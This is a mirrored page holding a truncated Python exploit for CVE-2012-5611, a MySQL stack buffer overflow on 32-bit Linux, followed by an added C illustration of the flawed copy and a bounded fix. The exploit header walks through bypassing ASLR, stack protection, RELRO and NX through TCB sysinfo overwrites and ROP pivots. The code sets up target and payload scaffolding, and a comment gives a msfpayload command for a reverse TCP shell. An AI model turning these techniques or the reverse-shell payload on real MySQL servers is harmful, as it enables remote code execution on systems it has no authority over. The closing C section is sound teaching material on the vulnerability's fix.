MySQL Stack Buffer Overflow Linux x86 32bits
2012-12-28 21:24
Test method:
The program (method) may be offensive in nature and is provided for security research and teaching only; use at your own risk!!

```python
#!/usr/bin/env python
# 27/12/12 - status : public release
# CVE-2012-5611 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611 )
# -------- Author : ipv
# -------- Impact : high
# -------- URL : http://blog.ring0.me/
# -------- Description
#
# The code below is linked to CVE-2012-5611, a flaw discovered by kingcope.
# MySQL server is prone to a remote buffer overflow that
# allows a remote authenticated attacker to reach code execution in the
# context of the user running the MySQL instance (default: mysql user).
# The vulnerability resides in the acl_get function, called when an authenticated
# user requests a privileged Account Management statement. MySQL fails
# to verify the length of the user-controlled "db" parameter.
#
# end=strmov((tmp_db=strmov(strmov(key, ip ? ip : "")+1,user)+1),db);
#
# The destination address of strcpy is located on an mmaped page dedicated to
# the user connection, which allows a buffer overflow onto adjacent memory.
#
# Different attack vectors may be possible according to the system.
# FYI Microsoft Windows versions are vulnerable as well.
#---------------------------------------------------------
# To bypass ASLR/SSP/RELRO/NX:
#------------------------------------------------------------------------------
# I take profit of the Threading-Model. This means MySQL uses only one address
# space for all MySQL resources (data structures, network management,
# session, etc.).
# To bypass SSP, I overwrite the sysinfo handler (pointing to the sysenter vdso) of
# the TCB structure located higher on the stack.
# ROP chains aim to pivot to our controlled stack data. At this point,
# if we overwrite the sysinfo handler, we cannot use ret2libc and/or the GOT
# dereferencing technique since the libc API relies on the sysinfo pointer
# to call sysenter.
#
# So to accomplish code exec, afaik, you have two ways :
# 1 - Extract sysinfo of an intact TCB and use it as a proxy call
#     (or you can restore the first sysinfo after doing modification on got)
#     -> I use it for the redhat exploit (no SSP on redhat/centos);
#     -> this allows us to bypass relro/aslr/nx
#     # relro.
# 2 - Find an int0x80 / sysenter gadget in .text ;
#     (A bad instruction follows the int0x80 gadget, you have a one shooter to get
#     code exec). So, I advise you to find a sysenter)
#     - I use sysenter for ubuntu 10.04 self-compiled with SSP.
#     - this allows us to bypass relro/ssp/aslr/nx
#
# Shellcodes are alphanum-mixed (skylined tool ftw). Exploit bypasses
# SSP/ASLR/NX.
#
#---------------------------------------------------------
# UTF-8 and ROP chains limitation :
#---------------------------------------------------------
# MySQL Schema Object Name restricts database name to be alphanumeric
# (and $ _).
# To bypass it, I use utf-8 encoding with bytes lower than 0x80. Encoding is
# done via MySQL when the database name is quoted with `` (mandatory to
# successfully exploit the target). Yes the devil is in the details.
# MySQL reference : https://dev.mysql.com/doc/refman/5.1/en/identifiers.html
#
# For any comments/job offer, mail me : ipv _at_ consortium-of-pwners . net
########################################################################
# Modules
#
import pymysql
import sys
import struct
import os, socket

########################################################################
# Authentication options
#
MYSQL_USER = "test"
MYSQL_PASSWORD = ""
#MYSQL_HOST = "192.168.130.147"
MYSQL_HOST = "192.168.130.129"
MYSQL_PORT = 3306

########################################################################
# Helper
#
def _x(v):
    # strings are already raw payload bytes; integers become little-endian dwords
    if isinstance(v, str):
        return v
    return struct.pack("<I", v)

# TCB is used when we face SSP
class _TCB:
    tcb = 0                     # updated later by a ret gadget
    dtv = "BBBB"
    _self = "CCCC"
    multiple_threads = "DDDD"
    sysinfo = 0                 # SEIP - updated later by stack pivot gadget
    stack_guard = "AAAA"
    pointer_guard = 0           # updated later by a pop pop ret gadget

# base class
class rc_base:
    eip_off = 0
    align_payload = 0
    align_stack = 2048
    retsled = ""
    safe_overwrite = ""
    pivot = ""
    pppr = ""
    ppr = ""
    # ./msf/msfpayload linux/x86/shell_reverse_tcp2 LHOST=192.168.130.1 LPORT=4444 R | ./alpha2 esp
    # XXX - CHANGEME !
    sc_rev_tcp =
```

(The script as mirrored here is cut off at `sc_rev_tcp =`; the remainder of the exploit is not on this page.)
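The root cause the header describes is a nested `strmov` chain that writes `ip\0user\0db\0` into a fixed per-connection buffer without checking how long `db` is. The C below is an added illustration, not code from the exploit above and not MySQL's source: it reproduces that unbounded copy shape beside a bounded variant that computes the required size first and refuses to write when the inputs would not fit. The buffer size, function names and sample inputs are constructed for illustration.

```c
/* Added example (not from the exploit above and not MySQL's source): the
 * unbounded nested-copy pattern the header quotes, beside a bounded variant
 * that rejects an oversized db name before any byte is written.  Buffer size,
 * function names and sample inputs are constructed for illustration. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define KEY_BUF_SIZE 32   /* constructed: stands in for the fixed per-connection buffer */

/* strmov-style copy: copies src to dst and returns a pointer to the
 * terminating NUL it wrote, which is what lets the header's calls nest. */
static char *strmov_like(char *dst, const char *src)
{
    while ((*dst = *src) != '\0') {
        dst++;
        src++;
    }
    return dst;
}

/* Total bytes the "ip\0user\0db\0" layout needs, NULs included. */
size_t key_bytes_needed(const char *ip, const char *user, const char *db)
{
    return strlen(ip ? ip : "") + 1 + strlen(user) + 1 + strlen(db) + 1;
}

/* Vulnerable shape: the same nested copy as the header's line, with no
 * length check.  The caller is trusted to have sized key for any db, so a
 * db longer than the buffer writes past its end.  Returns bytes written. */
size_t build_key_unbounded(char *key, const char *ip, const char *user, const char *db)
{
    char *tmp_db;
    char *end = strmov_like((tmp_db = strmov_like(strmov_like(key, ip ? ip : "") + 1, user) + 1), db);
    (void)tmp_db;
    return (size_t)(end - key) + 1;
}

/* Hardened shape: size first, copy second.  Returns 0 on success with the
 * byte count in *written, or -1 (nothing written) if key_size is too small. */
int build_key_bounded(char *key, size_t key_size,
                      const char *ip, const char *user, const char *db,
                      size_t *written)
{
    size_t needed = key_bytes_needed(ip, user, db);
    if (needed > key_size)
        return -1;                     /* reject instead of overflowing */
    *written = build_key_unbounded(key, ip, user, db);
    return 0;
}

int main(void)
{
    char key[KEY_BUF_SIZE];
    size_t n = 0;
    /* constructed inputs: a short db name fits, a longer one is refused */
    char long_db[KEY_BUF_SIZE + 8];
    memset(long_db, 'A', sizeof long_db - 1);
    long_db[sizeof long_db - 1] = '\0';

    if (build_key_bounded(key, sizeof key, "10.0.0.1", "root", "app", &n) == 0)
        printf("short db accepted: %zu bytes written\n", n);
    if (build_key_bounded(key, sizeof key, "10.0.0.1", "root", long_db, &n) != 0)
        printf("long db rejected: %zu bytes needed, buffer is %d\n",
               key_bytes_needed("10.0.0.1", "root", long_db), KEY_BUF_SIZE);
    return 0;
}
```

The point of the bounded version is that the length decision happens once, on the total, before the first copy; checking each piece separately would still let the three segments overrun together. In a server the rejection path should also be logged, since an identifier longer than the buffer is not something a legitimate client sends.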